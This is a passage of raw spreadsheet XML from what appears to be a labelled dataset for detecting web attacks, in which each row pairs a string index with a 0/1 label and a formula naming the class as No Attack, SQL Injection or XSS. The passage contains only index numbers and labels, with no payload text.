      <c r="B29397">
        <v>0</v>
      </c>
      <c r="C29397" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29398" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29398" s="1" t="s">
        <v>10382</v>
      </c>
      <c r="B29398">
        <v>0</v>
      </c>
      <c r="C29398" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29399" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29399" s="1" t="s">
        <v>10383</v>
      </c>
      <c r="B29399">
        <v>0</v>
      </c>
      <c r="C29399" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29400" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29400" s="1" t="s">
        <v>10384</v>
      </c>
      <c r="B29400">
        <v>0</v>
      </c>
      <c r="C29400" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29401" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29401" s="1" t="s">
        <v>10385</v>
      </c>
      <c r="B29401">
        <v>0</v>
      </c>
      <c r="C29401" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29402" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29402" s="1" t="s">
        <v>10387</v>
      </c>
      <c r="B29402">
        <v>0</v>
      </c>
      <c r="C29402" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29403" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29403" s="1" t="s">
        <v>10386</v>
      </c>
      <c r="B29403">
        <v>0</v>
      </c>
      <c r="C29403" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29404" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29404" s="1" t="s">
        <v>10388</v>
      </c>
      <c r="B29404">
        <v>0</v>
      </c>
      <c r="C29404" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29405" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29405" s="1" t="s">
        <v>10442</v>
      </c>
      <c r="B29405">
        <v>0</v>
      </c>
      <c r="C29405" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29406" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29406" s="1" t="s">
        <v>10389</v>
      </c>
      <c r="B29406">
        <v>0</v>
      </c>
      <c r="C29406" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29407" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29407" s="1" t="s">
        <v>10390</v>
      </c>
      <c r="B29407">
        <v>0</v>
      </c>
      <c r="C29407" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29408" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29408" s="1" t="s">
        <v>10391</v>
      </c>
      <c r="B29408">
        <v>0</v>
      </c>
      <c r="C29408" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29409" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29409" s="1" t="s">
        <v>10392</v>
      </c>
      <c r="B29409">
        <v>0</v>
      </c>
      <c r="C29409" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29410" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29410" s="1" t="s">
        <v>10444</v>
      </c>
      <c r="B29410">
        <v>0</v>
      </c>
      <c r="C29410" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29411" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29411" s="1" t="s">
        <v>10394</v>
      </c>
      <c r="B29411">
        <v>0</v>
      </c>
      <c r="C29411" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29412" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29412" s="1" t="s">
        <v>10393</v>
      </c>
      <c r="B29412">
        <v>0</v>
      </c>
      <c r="C29412" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29413" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29413" s="1" t="s">
        <v>10443</v>
      </c>
      <c r="B29413">
        <v>0</v>
      </c>
      <c r="C29413" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29414" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29414" s="1" t="s">
        <v>10395</v>
      </c>
      <c r="B29414">
        <v>0</v>
      </c>
      <c r="C29414" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29415" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29415" s="1" t="s">
        <v>10397</v>
      </c>
      <c r="B29415">
        <v>0</v>
      </c>
      <c r="C29415" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29416" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29416" s="1" t="s">
        <v>10398</v>
      </c>
      <c r="B29416">
        <v>0</v>
      </c>
      <c r="C29416" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29417" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29417" s="1" t="s">
        <v>10396</v>
      </c>
      <c r="B29417">
        <v>0</v>
      </c>
      <c r="C29417" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29418" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29418" s="1" t="s">
        <v>10399</v>
      </c>
      <c r="B29418">
        <v>0</v>
      </c>
      <c r="C29418" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29419" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29419" s="1" t="s">
        <v>10400</v>
      </c>
      <c r="B29419">
        <v>0</v>
      </c>
      <c r="C29419" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29420" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29420" s="1" t="s">
        <v>10401</v>
      </c>
      <c r="B29420">
        <v>0</v>
      </c>
      <c r="C29420" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29421" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29421" s="1" t="s">
        <v>10402</v>
      </c>
      <c r="B29421">
        <v>0</v>
      </c>
      <c r="C29421" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29422" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29422" s="1" t="s">
        <v>10403</v>
      </c>
      <c r="B29422">
        <v>0</v>
      </c>
      <c r="C29422" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29423" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29423" s="1" t="s">
        <v>10404</v>
      </c>
      <c r="B29423">
        <v>0</v>
      </c>
      <c r="C29423" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29424" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29424" s="1" t="s">
        <v>10405</v>
      </c>
      <c r="B29424">
        <v>0</v>
      </c>
      <c r="C29424" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29425" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29425" s="1" t="s">
        <v>10406</v>
      </c>
      <c r="B29425">
        <v>0</v>
      </c>
      <c r="C29425" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29426" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29426" s="1" t="s">
        <v>10407</v>
      </c>
      <c r="B29426">
        <v>0</v>
      </c>
      <c r="C29426" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29427" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29427" s="1" t="s">
        <v>10408</v>
      </c>
      <c r="B29427">
        <v>0</v>
      </c>
      <c r="C29427" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29428" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29428" s="1" t="s">
        <v>10409</v>
      </c>
      <c r="B29428">
        <v>0</v>
      </c>
      <c r="C29428" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29429" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29429" s="1" t="s">
        <v>10410</v>
      </c>
      <c r="B29429">
        <v>0</v>
      </c>
      <c r="C29429" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29430" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29430" s="1" t="s">
        <v>10412</v>
      </c>
      <c r="B29430">
        <v>0</v>
      </c>
      <c r="C29430" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29431" s="1" t="s">
        <v>10411</v>
      </c>
      <c r="B29431">
        <v>0</v>
      </c>
      <c r="C29431" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29432" s="1" t="s">
        <v>10413</v>
      </c>
      <c r="B29432">
        <v>0</v>
      </c>
      <c r="C29432" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29433" s="1" t="s">
        <v>10414</v>
      </c>
      <c r="B29433">
        <v>0</v>
      </c>
      <c r="C29433" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29434" s="1" t="s">
        <v>10415</v>
      </c>
      <c r="B29434">
        <v>0</v>
      </c>
      <c r="C29434" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29435" s="1" t="s">
        <v>10416</v>
      </c>
      <c r="B29435">
        <v>0</v>
      </c>
      <c r="C29435" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29436" s="1" t="s">
        <v>10417</v>
      </c>
      <c r="B29436">
        <v>0</v>
      </c>
      <c r="C29436" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29437" s="1" t="s">
        <v>10419</v>
      </c>
      <c r="B29437">
        <v>0</v>
      </c>
      <c r="C29437" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29438" s="1" t="s">
        <v>10420</v>
      </c>
      <c r="B29438">
        <v>0</v>
      </c>
      <c r="C29438" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29439" s="1" t="s">
        <v>10421</v>
      </c>
      <c r="B29439">
        <v>0</v>
      </c>
      <c r="C29439" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29440" s="1" t="s">
        <v>10422</v>
      </c>
      <c r="B29440">
        <v>0</v>
      </c>
      <c r="C29440" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29441" s="1" t="s">
        <v>10423</v>
      </c>
      <c r="B29441">
        <v>0</v>
      </c>
      <c r="C29441" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29442" s="1" t="s">
        <v>10424</v>
      </c>
      <c r="B29442">
        <v>0</v>
      </c>
      <c r="C29442" s="7" t="str">
        <f t="shared" si="459"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29443" s="1" t="s">
        <v>10425</v>
      </c>
      <c r="B29443">
        <v>0</v>
      </c>
      <c r="C29443" s="7" t="str">
        <f t="shared" ref="C29443:C29506" si="460">IF(B29443=0,"No Attack", IF(B29443=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29444" s="1" t="s">
        <v>10418</v>
      </c>
      <c r="B29444">
        <v>0</v>
      </c>
      <c r="C29444" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29445" s="1" t="s">
        <v>10426</v>
      </c>
      <c r="B29445">
        <v>0</v>
      </c>
      <c r="C29445" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29446" s="1" t="s">
        <v>10432</v>
      </c>
      <c r="B29446">
        <v>0</v>
      </c>
      <c r="C29446" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29447" s="1" t="s">
        <v>10427</v>
      </c>
      <c r="B29447">
        <v>0</v>
      </c>
      <c r="C29447" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29448" s="1" t="s">
        <v>10428</v>
      </c>
      <c r="B29448">
        <v>0</v>
      </c>
      <c r="C29448" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29449" s="1" t="s">
        <v>10429</v>
      </c>
      <c r="B29449">
        <v>0</v>
      </c>
      <c r="C29449" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29450" s="1" t="s">
        <v>10430</v>
      </c>
      <c r="B29450">
        <v>0</v>
      </c>
      <c r="C29450" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29451" s="1" t="s">
        <v>10431</v>
      </c>
      <c r="B29451">
        <v>0</v>
      </c>
      <c r="C29451" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29452" s="1" t="s">
        <v>10433</v>
      </c>
      <c r="B29452">
        <v>0</v>
      </c>
      <c r="C29452" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29453" s="1" t="s">
        <v>10434</v>
      </c>
      <c r="B29453">
        <v>0</v>
      </c>
      <c r="C29453" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29454" s="1" t="s">
        <v>10435</v>
      </c>
      <c r="B29454">
        <v>0</v>
      </c>
      <c r="C29454" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29455" s="1" t="s">
        <v>10436</v>
      </c>
      <c r="B29455">
        <v>0</v>
      </c>
      <c r="C29455" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29456" s="1" t="s">
        <v>10437</v>
      </c>
      <c r="B29456">
        <v>0</v>
      </c>
      <c r="C29456" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29457" s="1" t="s">
        <v>10438</v>
      </c>
      <c r="B29457">
        <v>0</v>
      </c>
      <c r="C29457" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29458" s="1" t="s">
        <v>10439</v>
      </c>
      <c r="B29458">
        <v>0</v>
      </c>
      <c r="C29458" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29459" s="1" t="s">
        <v>10440</v>
      </c>
      <c r="B29459">
        <v>0</v>
      </c>
      <c r="C29459" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29460" s="1" t="s">
        <v>10441</v>
      </c>
      <c r="B29460">
        <v>0</v>
      </c>
      <c r="C29460" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29461" s="1" t="s">
        <v>10917</v>
      </c>
      <c r="B29461">
        <v>0</v>
      </c>
      <c r="C29461" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29462" s="1" t="s">
        <v>10445</v>
      </c>
      <c r="B29462">
        <v>0</v>
      </c>
      <c r="C29462" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29463" s="1" t="s">
        <v>20327</v>
      </c>
      <c r="B29463">
        <v>0</v>
      </c>
      <c r="C29463" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29464" s="1" t="s">
        <v>10446</v>
      </c>
      <c r="B29464">
        <v>0</v>
      </c>
      <c r="C29464" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29465" s="1" t="s">
        <v>13437</v>
      </c>
      <c r="B29465">
        <v>1</v>
      </c>
      <c r="C29465" s="7" t="str">
        <f t="shared" si="460"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="29466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29466" s="1" t="s">
        <v>30635</v>
      </c>
      <c r="B29466">
        <v>0</v>
      </c>
      <c r="C29466" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29467" s="1" t="s">
        <v>10447</v>
      </c>
      <c r="B29467">
        <v>0</v>
      </c>
      <c r="C29467" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29468" s="1" t="s">
        <v>10448</v>
      </c>
      <c r="B29468">
        <v>0</v>
      </c>
      <c r="C29468" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29469" s="1" t="s">
        <v>10449</v>
      </c>
      <c r="B29469">
        <v>0</v>
      </c>
      <c r="C29469" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29470" s="1" t="s">
        <v>10450</v>
      </c>
      <c r="B29470">
        <v>0</v>
      </c>
      <c r="C29470" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29471" s="1" t="s">
        <v>10451</v>
      </c>
      <c r="B29471">
        <v>0</v>
      </c>
      <c r="C29471" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29472" s="1" t="s">
        <v>10456</v>
      </c>
      <c r="B29472">
        <v>0</v>
      </c>
      <c r="C29472" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29473" s="1" t="s">
        <v>10457</v>
      </c>
      <c r="B29473">
        <v>0</v>
      </c>
      <c r="C29473" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29474" s="1" t="s">
        <v>10458</v>
      </c>
      <c r="B29474">
        <v>0</v>
      </c>
      <c r="C29474" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29475" s="1" t="s">
        <v>10452</v>
      </c>
      <c r="B29475">
        <v>0</v>
      </c>
      <c r="C29475" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29476" s="1" t="s">
        <v>10459</v>
      </c>
      <c r="B29476">
        <v>0</v>
      </c>
      <c r="C29476" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29477" s="1" t="s">
        <v>10460</v>
      </c>
      <c r="B29477">
        <v>0</v>
      </c>
      <c r="C29477" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29478" s="1" t="s">
        <v>10461</v>
      </c>
      <c r="B29478">
        <v>0</v>
      </c>
      <c r="C29478" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29479" s="1" t="s">
        <v>10462</v>
      </c>
      <c r="B29479">
        <v>0</v>
      </c>
      <c r="C29479" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29480" s="1" t="s">
        <v>10463</v>
      </c>
      <c r="B29480">
        <v>0</v>
      </c>
      <c r="C29480" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29481" s="1" t="s">
        <v>10464</v>
      </c>
      <c r="B29481">
        <v>0</v>
      </c>
      <c r="C29481" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29482" s="1" t="s">
        <v>10465</v>
      </c>
      <c r="B29482">
        <v>0</v>
      </c>
      <c r="C29482" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29483" s="1" t="s">
        <v>10466</v>
      </c>
      <c r="B29483">
        <v>0</v>
      </c>
      <c r="C29483" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29484" s="1" t="s">
        <v>10467</v>
      </c>
      <c r="B29484">
        <v>0</v>
      </c>
      <c r="C29484" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29485" s="1" t="s">
        <v>10468</v>
      </c>
      <c r="B29485">
        <v>0</v>
      </c>
      <c r="C29485" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29486" s="1" t="s">
        <v>10469</v>
      </c>
      <c r="B29486">
        <v>0</v>
      </c>
      <c r="C29486" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29487" s="1" t="s">
        <v>10470</v>
      </c>
      <c r="B29487">
        <v>0</v>
      </c>
      <c r="C29487" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29488" s="1" t="s">
        <v>10453</v>
      </c>
      <c r="B29488">
        <v>0</v>
      </c>
      <c r="C29488" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29489" s="1" t="s">
        <v>10454</v>
      </c>
      <c r="B29489">
        <v>0</v>
      </c>
      <c r="C29489" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29490" s="1" t="s">
        <v>10455</v>
      </c>
      <c r="B29490">
        <v>0</v>
      </c>
      <c r="C29490" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29491" s="1" t="s">
        <v>35641</v>
      </c>
      <c r="B29491">
        <v>0</v>
      </c>
      <c r="C29491" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29492" s="1" t="s">
        <v>33269</v>
      </c>
      <c r="B29492">
        <v>0</v>
      </c>
      <c r="C29492" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29493" s="1" t="s">
        <v>36608</v>
      </c>
      <c r="B29493">
        <v>0</v>
      </c>
      <c r="C29493" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29494" s="1" t="s">
        <v>23246</v>
      </c>
      <c r="B29494">
        <v>0</v>
      </c>
      <c r="C29494" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29495" s="1" t="s">
        <v>31975</v>
      </c>
      <c r="B29495">
        <v>0</v>
      </c>
      <c r="C29495" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29496" s="1" t="s">
        <v>37356</v>
      </c>
      <c r="B29496">
        <v>0</v>
      </c>
      <c r="C29496" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29497" s="1" t="s">
        <v>22571</v>
      </c>
      <c r="B29497">
        <v>0</v>
      </c>
      <c r="C29497" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29498" s="1" t="s">
        <v>32190</v>
      </c>
      <c r="B29498">
        <v>0</v>
      </c>
      <c r="C29498" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29499" s="1" t="s">
        <v>21289</v>
      </c>
      <c r="B29499">
        <v>0</v>
      </c>
      <c r="C29499" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29500" s="1" t="s">
        <v>35141</v>
      </c>
      <c r="B29500">
        <v>0</v>
      </c>
      <c r="C29500" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="29501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29501" s="1" t="s">
        <v>21313</v>
      </c>
      <c r="B29501">
        <v>0</v>
      </c>
      <c r="C29501" s="7" t="str">
        <f t="shared" si="460"/>
        <v>No Attack</v>
      </c>
